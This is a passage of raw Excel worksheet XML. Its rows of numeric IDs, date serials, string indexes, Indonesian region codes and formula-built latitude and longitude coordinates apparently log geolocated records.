        <v>12626</v>
      </c>
      <c r="S3815" t="s">
        <v>12627</v>
      </c>
      <c r="T3815" t="s">
        <v>6630</v>
      </c>
      <c r="U3815" s="5">
        <v>120384104</v>
      </c>
      <c r="V3815" s="5" t="s">
        <v>17885</v>
      </c>
      <c r="W3815" s="5">
        <v>-3735155</v>
      </c>
      <c r="X3815" t="s">
        <v>21617</v>
      </c>
      <c r="Y3815" t="str">
        <f t="shared" si="59"/>
        <v>-3.735155,120.384104</v>
      </c>
    </row>
    <row r="3816" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3816">
        <v>296670</v>
      </c>
      <c r="B3816" s="1">
        <v>44436</v>
      </c>
      <c r="C3816" s="2">
        <v>0.22454861111111113</v>
      </c>
      <c r="D3816" t="s">
        <v>22</v>
      </c>
      <c r="E3816" t="s">
        <v>23</v>
      </c>
      <c r="F3816" t="s">
        <v>12628</v>
      </c>
      <c r="G3816" t="s">
        <v>12629</v>
      </c>
      <c r="H3816" t="s">
        <v>26</v>
      </c>
      <c r="I3816" t="s">
        <v>367</v>
      </c>
      <c r="J3816" t="s">
        <v>6626</v>
      </c>
      <c r="L3816" t="s">
        <v>12630</v>
      </c>
      <c r="M3816">
        <v>7313020010</v>
      </c>
      <c r="N3816">
        <v>7313020</v>
      </c>
      <c r="O3816">
        <v>7313</v>
      </c>
      <c r="P3816">
        <v>73</v>
      </c>
      <c r="Q3816" t="s">
        <v>12631</v>
      </c>
      <c r="R3816" t="s">
        <v>12632</v>
      </c>
      <c r="S3816" t="s">
        <v>12627</v>
      </c>
      <c r="T3816" t="s">
        <v>6630</v>
      </c>
      <c r="U3816" s="5">
        <v>120030109</v>
      </c>
      <c r="V3816" s="5" t="s">
        <v>17886</v>
      </c>
      <c r="W3816" s="5">
        <v>-4129795</v>
      </c>
      <c r="X3816" t="s">
        <v>21618</v>
      </c>
      <c r="Y3816" t="str">
        <f t="shared" si="59"/>
        <v>-4.129795,120.030109</v>
      </c>
    </row>
    <row r="3817" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3817">
        <v>296669</v>
      </c>
      <c r="B3817" s="1">
        <v>44436</v>
      </c>
      <c r="C3817" s="2">
        <v>0.18383101851851849</v>
      </c>
      <c r="D3817" t="s">
        <v>22</v>
      </c>
      <c r="E3817" t="s">
        <v>23</v>
      </c>
      <c r="F3817" t="s">
        <v>12633</v>
      </c>
      <c r="G3817" t="s">
        <v>12634</v>
      </c>
      <c r="H3817" t="s">
        <v>26</v>
      </c>
      <c r="I3817" t="s">
        <v>443</v>
      </c>
      <c r="J3817" t="s">
        <v>6626</v>
      </c>
      <c r="L3817" t="s">
        <v>12635</v>
      </c>
      <c r="M3817">
        <v>7311220009</v>
      </c>
      <c r="N3817">
        <v>7311220</v>
      </c>
      <c r="O3817">
        <v>7311</v>
      </c>
      <c r="P3817">
        <v>73</v>
      </c>
      <c r="Q3817" t="s">
        <v>12636</v>
      </c>
      <c r="R3817" t="s">
        <v>12637</v>
      </c>
      <c r="S3817" t="s">
        <v>7551</v>
      </c>
      <c r="T3817" t="s">
        <v>6630</v>
      </c>
      <c r="U3817" s="5">
        <v>120222702</v>
      </c>
      <c r="V3817" s="5" t="s">
        <v>17887</v>
      </c>
      <c r="W3817" s="5">
        <v>-4323665</v>
      </c>
      <c r="X3817" t="s">
        <v>21619</v>
      </c>
      <c r="Y3817" t="str">
        <f t="shared" si="59"/>
        <v>-4.323665,120.222702</v>
      </c>
    </row>
    <row r="3818" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3818">
        <v>296512</v>
      </c>
      <c r="B3818" s="1">
        <v>44434</v>
      </c>
      <c r="C3818" s="2">
        <v>0.4770833333333333</v>
      </c>
      <c r="D3818" t="s">
        <v>2648</v>
      </c>
      <c r="E3818" t="s">
        <v>23</v>
      </c>
      <c r="G3818" t="s">
        <v>12638</v>
      </c>
      <c r="H3818" t="s">
        <v>26</v>
      </c>
      <c r="J3818" t="s">
        <v>12639</v>
      </c>
      <c r="L3818" t="s">
        <v>12640</v>
      </c>
      <c r="M3818">
        <v>3173010005</v>
      </c>
      <c r="N3818">
        <v>3173010</v>
      </c>
      <c r="O3818">
        <v>3173</v>
      </c>
      <c r="P3818">
        <v>31</v>
      </c>
      <c r="Q3818" t="s">
        <v>5805</v>
      </c>
      <c r="R3818" t="s">
        <v>1481</v>
      </c>
      <c r="S3818" t="s">
        <v>62</v>
      </c>
      <c r="T3818" t="s">
        <v>33</v>
      </c>
      <c r="U3818" s="5">
        <v>106802452</v>
      </c>
      <c r="V3818" s="5" t="s">
        <v>17888</v>
      </c>
      <c r="W3818" s="5">
        <v>-6202948</v>
      </c>
      <c r="X3818" t="s">
        <v>21620</v>
      </c>
      <c r="Y3818" t="str">
        <f t="shared" si="59"/>
        <v>-6.202948,106.802452</v>
      </c>
    </row>
    <row r="3819" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3819">
        <v>296511</v>
      </c>
      <c r="B3819" s="1">
        <v>44434</v>
      </c>
      <c r="C3819" s="2">
        <v>0.38026620370370368</v>
      </c>
      <c r="D3819" t="s">
        <v>22</v>
      </c>
      <c r="E3819" t="s">
        <v>23</v>
      </c>
      <c r="F3819" t="s">
        <v>12641</v>
      </c>
      <c r="G3819" t="s">
        <v>12642</v>
      </c>
      <c r="H3819" t="s">
        <v>26</v>
      </c>
      <c r="I3819" t="s">
        <v>886</v>
      </c>
      <c r="J3819" t="s">
        <v>3135</v>
      </c>
      <c r="L3819" t="s">
        <v>12643</v>
      </c>
      <c r="M3819">
        <v>3603081006</v>
      </c>
      <c r="N3819">
        <v>3603081</v>
      </c>
      <c r="O3819">
        <v>3603</v>
      </c>
      <c r="P3819">
        <v>36</v>
      </c>
      <c r="Q3819" t="s">
        <v>12644</v>
      </c>
      <c r="R3819" t="s">
        <v>12645</v>
      </c>
      <c r="S3819" t="s">
        <v>201</v>
      </c>
      <c r="T3819" t="s">
        <v>171</v>
      </c>
      <c r="U3819" s="5">
        <v>106651188</v>
      </c>
      <c r="V3819" s="5" t="s">
        <v>17889</v>
      </c>
      <c r="W3819" s="5">
        <v>-6335926</v>
      </c>
      <c r="X3819" t="s">
        <v>21621</v>
      </c>
      <c r="Y3819" t="str">
        <f t="shared" si="59"/>
        <v>-6.335926,106.651188</v>
      </c>
    </row>
    <row r="3820" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3820">
        <v>296510</v>
      </c>
      <c r="B3820" s="1">
        <v>44431</v>
      </c>
      <c r="C3820" s="2">
        <v>0.49862268518518515</v>
      </c>
      <c r="D3820" t="s">
        <v>22</v>
      </c>
      <c r="E3820" t="s">
        <v>23</v>
      </c>
      <c r="F3820" t="s">
        <v>12646</v>
      </c>
      <c r="G3820" t="s">
        <v>12647</v>
      </c>
      <c r="H3820" t="s">
        <v>26</v>
      </c>
      <c r="I3820" t="s">
        <v>628</v>
      </c>
      <c r="J3820" t="s">
        <v>7436</v>
      </c>
      <c r="L3820" t="s">
        <v>12648</v>
      </c>
      <c r="M3820">
        <v>6108230002</v>
      </c>
      <c r="N3820">
        <v>6108230</v>
      </c>
      <c r="O3820">
        <v>6108</v>
      </c>
      <c r="P3820">
        <v>61</v>
      </c>
      <c r="Q3820" t="s">
        <v>12649</v>
      </c>
      <c r="R3820" t="s">
        <v>12650</v>
      </c>
      <c r="S3820" t="s">
        <v>7812</v>
      </c>
      <c r="T3820" t="s">
        <v>7441</v>
      </c>
      <c r="U3820" s="5">
        <v>112921633</v>
      </c>
      <c r="V3820" s="5" t="s">
        <v>17890</v>
      </c>
      <c r="W3820" s="5">
        <v>870805</v>
      </c>
      <c r="X3820" t="s">
        <v>21622</v>
      </c>
      <c r="Y3820" t="str">
        <f t="shared" si="59"/>
        <v>8.70805,112.921633</v>
      </c>
    </row>
    <row r="3821" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3821">
        <v>296509</v>
      </c>
      <c r="B3821" s="1">
        <v>44431</v>
      </c>
      <c r="C3821" s="2">
        <v>0.21877314814814816</v>
      </c>
      <c r="D3821" t="s">
        <v>22</v>
      </c>
      <c r="E3821" t="s">
        <v>23</v>
      </c>
      <c r="F3821" t="s">
        <v>12651</v>
      </c>
      <c r="G3821" t="s">
        <v>12652</v>
      </c>
      <c r="H3821" t="s">
        <v>26</v>
      </c>
      <c r="I3821" t="s">
        <v>5666</v>
      </c>
      <c r="J3821" t="s">
        <v>7436</v>
      </c>
      <c r="L3821" t="s">
        <v>12653</v>
      </c>
      <c r="M3821">
        <v>6108080003</v>
      </c>
      <c r="N3821">
        <v>6108080</v>
      </c>
      <c r="O3821">
        <v>6108</v>
      </c>
      <c r="P3821">
        <v>61</v>
      </c>
      <c r="Q3821" t="s">
        <v>12654</v>
      </c>
      <c r="R3821" t="s">
        <v>7811</v>
      </c>
      <c r="S3821" t="s">
        <v>7812</v>
      </c>
      <c r="T3821" t="s">
        <v>7441</v>
      </c>
      <c r="U3821" s="5">
        <v>112922298</v>
      </c>
      <c r="V3821" s="5" t="s">
        <v>17891</v>
      </c>
      <c r="W3821" s="5">
        <v>855566</v>
      </c>
      <c r="X3821" t="s">
        <v>21623</v>
      </c>
      <c r="Y3821" t="str">
        <f t="shared" si="59"/>
        <v>8.55566,112.922298</v>
      </c>
    </row>
    <row r="3822" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3822">
        <v>296508</v>
      </c>
      <c r="B3822" s="1">
        <v>44430</v>
      </c>
      <c r="C3822" s="2">
        <v>0.23108796296296297</v>
      </c>
      <c r="D3822" t="s">
        <v>22</v>
      </c>
      <c r="E3822" t="s">
        <v>23</v>
      </c>
      <c r="F3822" t="s">
        <v>12655</v>
      </c>
      <c r="H3822" t="s">
        <v>26</v>
      </c>
      <c r="I3822" t="s">
        <v>12656</v>
      </c>
      <c r="J3822" t="s">
        <v>2627</v>
      </c>
      <c r="L3822" t="s">
        <v>12657</v>
      </c>
      <c r="M3822">
        <v>3271050004</v>
      </c>
      <c r="N3822">
        <v>3271050</v>
      </c>
      <c r="O3822">
        <v>3271</v>
      </c>
      <c r="P3822">
        <v>32</v>
      </c>
      <c r="Q3822" t="s">
        <v>12658</v>
      </c>
      <c r="R3822" t="s">
        <v>12659</v>
      </c>
      <c r="S3822" t="s">
        <v>421</v>
      </c>
      <c r="T3822" t="s">
        <v>42</v>
      </c>
      <c r="U3822" s="5">
        <v>106779256</v>
      </c>
      <c r="V3822" s="5" t="s">
        <v>17892</v>
      </c>
      <c r="W3822" s="5">
        <v>-6595400</v>
      </c>
      <c r="X3822" t="s">
        <v>21624</v>
      </c>
      <c r="Y3822" t="str">
        <f t="shared" si="59"/>
        <v>-6.595400,106.779256</v>
      </c>
    </row>
    <row r="3823" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3823">
        <v>296507</v>
      </c>
      <c r="B3823" s="1">
        <v>44426</v>
      </c>
      <c r="C3823" s="2">
        <v>0.64688657407407402</v>
      </c>
      <c r="D3823" t="s">
        <v>22</v>
      </c>
      <c r="E3823" t="s">
        <v>23</v>
      </c>
      <c r="F3823" t="s">
        <v>12660</v>
      </c>
      <c r="G3823" t="s">
        <v>12661</v>
      </c>
      <c r="H3823" t="s">
        <v>26</v>
      </c>
      <c r="I3823" t="s">
        <v>3731</v>
      </c>
      <c r="J3823" t="s">
        <v>7436</v>
      </c>
      <c r="L3823" t="s">
        <v>12662</v>
      </c>
      <c r="M3823">
        <v>6108040004</v>
      </c>
      <c r="N3823">
        <v>6108040</v>
      </c>
      <c r="O3823">
        <v>6108</v>
      </c>
      <c r="P3823">
        <v>61</v>
      </c>
      <c r="Q3823" t="s">
        <v>12663</v>
      </c>
      <c r="R3823" t="s">
        <v>12664</v>
      </c>
      <c r="S3823" t="s">
        <v>7812</v>
      </c>
      <c r="T3823" t="s">
        <v>7441</v>
      </c>
      <c r="U3823" s="5">
        <v>112663066</v>
      </c>
      <c r="V3823" s="5" t="s">
        <v>17893</v>
      </c>
      <c r="W3823" s="5">
        <v>479167</v>
      </c>
      <c r="X3823" t="s">
        <v>21625</v>
      </c>
      <c r="Y3823" t="str">
        <f t="shared" si="59"/>
        <v>4.79167,112.663066</v>
      </c>
    </row>
    <row r="3824" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3824">
        <v>296506</v>
      </c>
      <c r="B3824" s="1">
        <v>44418</v>
      </c>
      <c r="C3824" s="2">
        <v>0.35440972222222222</v>
      </c>
      <c r="D3824" t="s">
        <v>22</v>
      </c>
      <c r="E3824" t="s">
        <v>23</v>
      </c>
      <c r="F3824" t="s">
        <v>12665</v>
      </c>
      <c r="H3824" t="s">
        <v>26</v>
      </c>
      <c r="I3824" t="s">
        <v>137</v>
      </c>
      <c r="J3824" t="s">
        <v>2627</v>
      </c>
      <c r="L3824" t="s">
        <v>12666</v>
      </c>
      <c r="M3824">
        <v>3273220004</v>
      </c>
      <c r="N3824">
        <v>3273220</v>
      </c>
      <c r="O3824">
        <v>3273</v>
      </c>
      <c r="P3824">
        <v>32</v>
      </c>
      <c r="Q3824" t="s">
        <v>12667</v>
      </c>
      <c r="R3824" t="s">
        <v>12668</v>
      </c>
      <c r="S3824" t="s">
        <v>1464</v>
      </c>
      <c r="T3824" t="s">
        <v>42</v>
      </c>
      <c r="U3824" s="5">
        <v>107629666</v>
      </c>
      <c r="V3824" s="5" t="s">
        <v>17894</v>
      </c>
      <c r="W3824" s="5">
        <v>-6886241</v>
      </c>
      <c r="X3824" t="s">
        <v>21626</v>
      </c>
      <c r="Y3824" t="str">
        <f t="shared" si="59"/>
        <v>-6.886241,107.629666</v>
      </c>
    </row>
    <row r="3825" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3825">
        <v>296504</v>
      </c>
      <c r="B3825" s="1">
        <v>44417</v>
      </c>
      <c r="C3825" s="2">
        <v>0.72863425925925929</v>
      </c>
      <c r="D3825" t="s">
        <v>22</v>
      </c>
      <c r="E3825" t="s">
        <v>23</v>
      </c>
      <c r="F3825" t="s">
        <v>12669</v>
      </c>
      <c r="G3825" t="s">
        <v>12670</v>
      </c>
      <c r="H3825" t="s">
        <v>26</v>
      </c>
      <c r="I3825" t="s">
        <v>1758</v>
      </c>
      <c r="J3825" t="s">
        <v>3424</v>
      </c>
      <c r="L3825" t="s">
        <v>12671</v>
      </c>
      <c r="M3825">
        <v>3172080006</v>
      </c>
      <c r="N3825">
        <v>3172080</v>
      </c>
      <c r="O3825">
        <v>3172</v>
      </c>
      <c r="P3825">
        <v>31</v>
      </c>
      <c r="Q3825" t="s">
        <v>2853</v>
      </c>
      <c r="R3825" t="s">
        <v>141</v>
      </c>
      <c r="S3825" t="s">
        <v>49</v>
      </c>
      <c r="T3825" t="s">
        <v>33</v>
      </c>
      <c r="U3825" s="5">
        <v>106935634</v>
      </c>
      <c r="V3825" s="5" t="s">
        <v>17895</v>
      </c>
      <c r="W3825" s="5">
        <v>-6181898</v>
      </c>
      <c r="X3825" t="s">
        <v>21627</v>
      </c>
      <c r="Y3825" t="str">
        <f t="shared" si="59"/>
        <v>-6.181898,106.935634</v>
      </c>
    </row>
    <row r="3826" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3826">
        <v>296503</v>
      </c>
      <c r="B3826" s="1">
        <v>44417</v>
      </c>
      <c r="C3826" s="2">
        <v>0.69560185185185175</v>
      </c>
      <c r="D3826" t="s">
        <v>22</v>
      </c>
      <c r="E3826" t="s">
        <v>23</v>
      </c>
      <c r="F3826" t="s">
        <v>12672</v>
      </c>
      <c r="H3826" t="s">
        <v>7086</v>
      </c>
      <c r="I3826" t="s">
        <v>7733</v>
      </c>
      <c r="J3826" t="s">
        <v>2608</v>
      </c>
      <c r="L3826" t="s">
        <v>12673</v>
      </c>
      <c r="M3826">
        <v>3301150012</v>
      </c>
      <c r="N3826">
        <v>3301150</v>
      </c>
      <c r="O3826">
        <v>3301</v>
      </c>
      <c r="P3826">
        <v>33</v>
      </c>
      <c r="Q3826" t="s">
        <v>12674</v>
      </c>
      <c r="R3826" t="s">
        <v>12674</v>
      </c>
      <c r="S3826" t="s">
        <v>2642</v>
      </c>
      <c r="T3826" t="s">
        <v>1134</v>
      </c>
      <c r="U3826" s="5">
        <v>109146702</v>
      </c>
      <c r="V3826" s="5" t="s">
        <v>17896</v>
      </c>
      <c r="W3826" s="5">
        <v>-7658382</v>
      </c>
      <c r="X3826" t="s">
        <v>21628</v>
      </c>
      <c r="Y3826" t="str">
        <f t="shared" si="59"/>
        <v>-7.658382,109.146702</v>
      </c>
    </row>
    <row r="3827" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3827">
        <v>296488</v>
      </c>
      <c r="B3827" s="1">
        <v>44410</v>
      </c>
      <c r="C3827" s="2">
        <v>0.63951388888888883</v>
      </c>
      <c r="D3827" t="s">
        <v>22</v>
      </c>
      <c r="E3827" t="s">
        <v>23</v>
      </c>
      <c r="F3827" t="s">
        <v>12675</v>
      </c>
      <c r="G3827" t="s">
        <v>12676</v>
      </c>
      <c r="H3827" t="s">
        <v>7978</v>
      </c>
      <c r="I3827" t="s">
        <v>7979</v>
      </c>
      <c r="J3827" t="s">
        <v>2627</v>
      </c>
      <c r="L3827" t="s">
        <v>12677</v>
      </c>
      <c r="M3827">
        <v>3277030002</v>
      </c>
      <c r="N3827">
        <v>3277030</v>
      </c>
      <c r="O3827">
        <v>3277</v>
      </c>
      <c r="P3827">
        <v>32</v>
      </c>
      <c r="Q3827" t="s">
        <v>12356</v>
      </c>
      <c r="R3827" t="s">
        <v>12357</v>
      </c>
      <c r="S3827" t="s">
        <v>7776</v>
      </c>
      <c r="T3827" t="s">
        <v>42</v>
      </c>
      <c r="U3827" s="5">
        <v>107552972</v>
      </c>
      <c r="V3827" s="5" t="s">
        <v>17897</v>
      </c>
      <c r="W3827" s="5">
        <v>-6877852</v>
      </c>
      <c r="X3827" t="s">
        <v>21629</v>
      </c>
      <c r="Y3827" t="str">
        <f t="shared" si="59"/>
        <v>-6.877852,107.552972</v>
      </c>
    </row>
    <row r="3828" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3828">
        <v>296487</v>
      </c>
      <c r="B3828" s="1">
        <v>44410</v>
      </c>
      <c r="C3828" s="2">
        <v>0.63664351851851853</v>
      </c>
      <c r="D3828" t="s">
        <v>22</v>
      </c>
      <c r="E3828" t="s">
        <v>23</v>
      </c>
      <c r="F3828" t="s">
        <v>12678</v>
      </c>
      <c r="G3828" t="s">
        <v>12679</v>
      </c>
      <c r="H3828" t="s">
        <v>7978</v>
      </c>
      <c r="I3828" t="s">
        <v>7979</v>
      </c>
      <c r="J3828" t="s">
        <v>2627</v>
      </c>
      <c r="L3828" t="s">
        <v>12680</v>
      </c>
      <c r="M3828">
        <v>3277030002</v>
      </c>
      <c r="N3828">
        <v>3277030</v>
      </c>
      <c r="O3828">
        <v>3277</v>
      </c>
      <c r="P3828">
        <v>32</v>
      </c>
      <c r="Q3828" t="s">
        <v>12356</v>
      </c>
      <c r="R3828" t="s">
        <v>12357</v>
      </c>
      <c r="S3828" t="s">
        <v>7776</v>
      </c>
      <c r="T3828" t="s">
        <v>42</v>
      </c>
      <c r="U3828" s="5">
        <v>107553320</v>
      </c>
      <c r="V3828" s="5" t="s">
        <v>17898</v>
      </c>
      <c r="W3828" s="5">
        <v>-6877553</v>
      </c>
      <c r="X3828" t="s">
        <v>21630</v>
      </c>
      <c r="Y3828" t="str">
        <f t="shared" si="59"/>
        <v>-6.877553,107.553320</v>
      </c>
    </row>
    <row r="3829" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3829">
        <v>296889</v>
      </c>
      <c r="B3829" s="1">
        <v>44439</v>
      </c>
      <c r="C3829" s="2">
        <v>8.744212962962962E-2</v>
      </c>
      <c r="D3829" t="s">
        <v>22</v>
      </c>
      <c r="E3829" t="s">
        <v>23</v>
      </c>
      <c r="F3829" t="s">
        <v>12681</v>
      </c>
      <c r="G3829" t="s">
        <v>12682</v>
      </c>
      <c r="H3829" t="s">
        <v>26</v>
      </c>
      <c r="I3829" t="s">
        <v>555</v>
      </c>
      <c r="J3829" t="s">
        <v>7171</v>
      </c>
      <c r="L3829" t="s">
        <v>12683</v>
      </c>
      <c r="M3829">
        <v>6472031003</v>
      </c>
      <c r="N3829">
        <v>6472031</v>
      </c>
      <c r="O3829">
        <v>6472</v>
      </c>
      <c r="P3829">
        <v>64</v>
      </c>
      <c r="Q3829" t="s">
        <v>12684</v>
      </c>
      <c r="R3829" t="s">
        <v>12685</v>
      </c>
      <c r="S3829" t="s">
        <v>7175</v>
      </c>
      <c r="T3829" t="s">
        <v>1308</v>
      </c>
      <c r="U3829" s="5">
        <v>117099967</v>
      </c>
      <c r="V3829" s="5" t="s">
        <v>17899</v>
      </c>
      <c r="W3829" s="5">
        <v>-575941</v>
      </c>
      <c r="X3829" t="s">
        <v>21631</v>
      </c>
      <c r="Y3829" t="str">
        <f t="shared" si="59"/>
        <v>-5.75941,117.099967</v>
      </c>
    </row>
    <row r="3830" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3830">
        <v>296673</v>
      </c>
      <c r="B3830" s="1">
        <v>44437</v>
      </c>
      <c r="C3830" s="2">
        <v>0.20486111111111113</v>
      </c>
      <c r="D3830" t="s">
        <v>2648</v>
      </c>
      <c r="E3830" t="s">
        <v>23</v>
      </c>
      <c r="G3830" t="s">
        <v>12686</v>
      </c>
      <c r="H3830" t="s">
        <v>26</v>
      </c>
      <c r="J3830" t="s">
        <v>1596</v>
      </c>
      <c r="L3830" t="s">
        <v>12687</v>
      </c>
      <c r="M3830">
        <v>3173040001</v>
      </c>
      <c r="N3830">
        <v>3173040</v>
      </c>
      <c r="O3830">
        <v>3173</v>
      </c>
      <c r="P3830">
        <v>31</v>
      </c>
      <c r="Q3830" t="s">
        <v>1598</v>
      </c>
      <c r="R3830" t="s">
        <v>1598</v>
      </c>
      <c r="S3830" t="s">
        <v>62</v>
      </c>
      <c r="T3830" t="s">
        <v>33</v>
      </c>
      <c r="U3830" s="5">
        <v>106860664</v>
      </c>
      <c r="V3830" s="5" t="s">
        <v>17900</v>
      </c>
      <c r="W3830" s="5">
        <v>-6182265</v>
      </c>
      <c r="X3830" t="s">
        <v>21632</v>
      </c>
      <c r="Y3830" t="str">
        <f t="shared" si="59"/>
        <v>-6.182265,106.860664</v>
      </c>
    </row>
    <row r="3831" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3831">
        <v>296672</v>
      </c>
      <c r="B3831" s="1">
        <v>44436</v>
      </c>
      <c r="C3831" s="2">
        <v>0.9783680555555555</v>
      </c>
      <c r="D3831" t="s">
        <v>22</v>
      </c>
      <c r="E3831" t="s">
        <v>23</v>
      </c>
      <c r="F3831" t="s">
        <v>12688</v>
      </c>
      <c r="G3831" t="s">
        <v>12689</v>
      </c>
      <c r="H3831" t="s">
        <v>26</v>
      </c>
      <c r="I3831" t="s">
        <v>3211</v>
      </c>
      <c r="J3831" t="s">
        <v>6026</v>
      </c>
      <c r="L3831" t="s">
        <v>12690</v>
      </c>
      <c r="M3831">
        <v>3172050003</v>
      </c>
      <c r="N3831">
        <v>3172050</v>
      </c>
      <c r="O3831">
        <v>3172</v>
      </c>
      <c r="P3831">
        <v>31</v>
      </c>
      <c r="Q3831" t="s">
        <v>2896</v>
      </c>
      <c r="R3831" t="s">
        <v>358</v>
      </c>
      <c r="S3831" t="s">
        <v>49</v>
      </c>
      <c r="T3831" t="s">
        <v>33</v>
      </c>
      <c r="U3831" s="5">
        <v>106867148</v>
      </c>
      <c r="V3831" s="5" t="s">
        <v>17901</v>
      </c>
      <c r="W3831" s="5">
        <v>-6292497</v>
      </c>
      <c r="X3831" t="s">
        <v>21633</v>
      </c>
      <c r="Y3831" t="str">
        <f t="shared" si="59"/>
        <v>-6.292497,106.867148</v>
      </c>
    </row>
    <row r="3832" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3832">
        <v>296671</v>
      </c>
      <c r="B3832" s="1">
        <v>44436</v>
      </c>
      <c r="C3832" s="2">
        <v>0.86890046296296297</v>
      </c>
      <c r="D3832" t="s">
        <v>22</v>
      </c>
      <c r="E3832" t="s">
        <v>23</v>
      </c>
      <c r="F3832" t="s">
        <v>12622</v>
      </c>
      <c r="G3832" t="s">
        <v>12623</v>
      </c>
      <c r="H3832" t="s">
        <v>26</v>
      </c>
      <c r="I3832" t="s">
        <v>666</v>
      </c>
      <c r="J3832" t="s">
        <v>6626</v>
      </c>
      <c r="L3832" t="s">
        <v>12624</v>
      </c>
      <c r="M3832">
        <v>7313120005</v>
      </c>
      <c r="N3832">
        <v>7313120</v>
      </c>
      <c r="O3832">
        <v>7313</v>
      </c>
      <c r="P3832">
        <v>73</v>
      </c>
      <c r="Q3832" t="s">
        <v>12625</v>
      </c>
      <c r="R3832" t="s">
        <v>12626</v>
      </c>
      <c r="S3832" t="s">
        <v>12627</v>
      </c>
      <c r="T3832" t="s">
        <v>6630</v>
      </c>
      <c r="U3832" s="5">
        <v>120384104</v>
      </c>
      <c r="V3832" s="5" t="s">
        <v>17885</v>
      </c>
      <c r="W3832" s="5">
        <v>-3735155</v>
      </c>
      <c r="X3832" t="s">
        <v>21617</v>
      </c>
      <c r="Y3832" t="str">
        <f t="shared" si="59"/>
        <v>-3.735155,120.384104</v>
      </c>
    </row>
    <row r="3833" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3833">
        <v>296966</v>
      </c>
      <c r="B3833" s="1">
        <v>44442</v>
      </c>
      <c r="C3833" t="s">
        <v>12691</v>
      </c>
      <c r="D3833" t="s">
        <v>22</v>
      </c>
      <c r="E3833" t="s">
        <v>23</v>
      </c>
      <c r="F3833" t="s">
        <v>12692</v>
      </c>
      <c r="G3833" t="s">
        <v>12693</v>
      </c>
      <c r="H3833" t="s">
        <v>26</v>
      </c>
      <c r="I3833" t="s">
        <v>3668</v>
      </c>
      <c r="J3833" t="s">
        <v>7436</v>
      </c>
      <c r="L3833" t="s">
        <v>12694</v>
      </c>
      <c r="M3833">
        <v>6108080003</v>
      </c>
      <c r="N3833">
        <v>6108080</v>
      </c>
      <c r="O3833">
        <v>6108</v>
      </c>
      <c r="P3833">
        <v>61</v>
      </c>
      <c r="Q3833" t="s">
        <v>12654</v>
      </c>
      <c r="R3833" t="s">
        <v>7811</v>
      </c>
      <c r="S3833" t="s">
        <v>7812</v>
      </c>
      <c r="T3833" t="s">
        <v>7441</v>
      </c>
      <c r="U3833" s="5">
        <v>112919486761</v>
      </c>
      <c r="V3833" s="5" t="s">
        <v>17902</v>
      </c>
      <c r="W3833" s="5">
        <v>855217408</v>
      </c>
      <c r="X3833" s="5" t="s">
        <v>14452</v>
      </c>
      <c r="Y3833" t="str">
        <f t="shared" si="59"/>
        <v>0.855217408,112.919486761</v>
      </c>
    </row>
    <row r="3834" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3834">
        <v>296967</v>
      </c>
      <c r="B3834" s="1">
        <v>44443</v>
      </c>
      <c r="C3834" t="s">
        <v>12695</v>
      </c>
      <c r="D3834" t="s">
        <v>22</v>
      </c>
      <c r="E3834" t="s">
        <v>23</v>
      </c>
      <c r="F3834" t="s">
        <v>12696</v>
      </c>
      <c r="G3834" t="s">
        <v>12697</v>
      </c>
      <c r="H3834" t="s">
        <v>26</v>
      </c>
      <c r="I3834" t="s">
        <v>76</v>
      </c>
      <c r="J3834" t="s">
        <v>7171</v>
      </c>
      <c r="M3834">
        <v>6472060011</v>
      </c>
      <c r="N3834">
        <v>6472060</v>
      </c>
      <c r="O3834">
        <v>6472</v>
      </c>
      <c r="P3834">
        <v>64</v>
      </c>
      <c r="Q3834" t="s">
        <v>7202</v>
      </c>
      <c r="R3834" t="s">
        <v>7203</v>
      </c>
      <c r="S3834" t="s">
        <v>7175</v>
      </c>
      <c r="T3834" t="s">
        <v>1308</v>
      </c>
      <c r="U3834" s="5">
        <v>117168635130</v>
      </c>
      <c r="V3834" s="5" t="s">
        <v>17903</v>
      </c>
      <c r="W3834" s="5">
        <v>-427429288</v>
      </c>
      <c r="X3834" t="s">
        <v>21634</v>
      </c>
      <c r="Y3834" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.427429288,117.168635130</v>
      </c>
    </row>
    <row r="3835" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3835">
        <v>296968</v>
      </c>
      <c r="B3835" s="1">
        <v>44443</v>
      </c>
      <c r="C3835" t="s">
        <v>12698</v>
      </c>
      <c r="D3835" t="s">
        <v>22</v>
      </c>
      <c r="E3835" t="s">
        <v>23</v>
      </c>
      <c r="F3835" t="s">
        <v>12699</v>
      </c>
      <c r="G3835" t="s">
        <v>12700</v>
      </c>
      <c r="H3835" t="s">
        <v>26</v>
      </c>
      <c r="I3835" t="s">
        <v>80</v>
      </c>
      <c r="J3835" t="s">
        <v>7171</v>
      </c>
      <c r="L3835" t="s">
        <v>12701</v>
      </c>
      <c r="M3835">
        <v>6472060011</v>
      </c>
      <c r="N3835">
        <v>6472060</v>
      </c>
      <c r="O3835">
        <v>6472</v>
      </c>
      <c r="P3835">
        <v>64</v>
      </c>
      <c r="Q3835" t="s">
        <v>7202</v>
      </c>
      <c r="R3835" t="s">
        <v>7203</v>
      </c>
      <c r="S3835" t="s">
        <v>7175</v>
      </c>
      <c r="T3835" t="s">
        <v>1308</v>
      </c>
      <c r="U3835" s="5">
        <v>117167456746</v>
      </c>
      <c r="V3835" s="5" t="s">
        <v>17904</v>
      </c>
      <c r="W3835" s="5">
        <v>-427977337</v>
      </c>
      <c r="X3835" t="s">
        <v>21635</v>
      </c>
      <c r="Y3835" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.427977337,117.167456746</v>
      </c>
    </row>
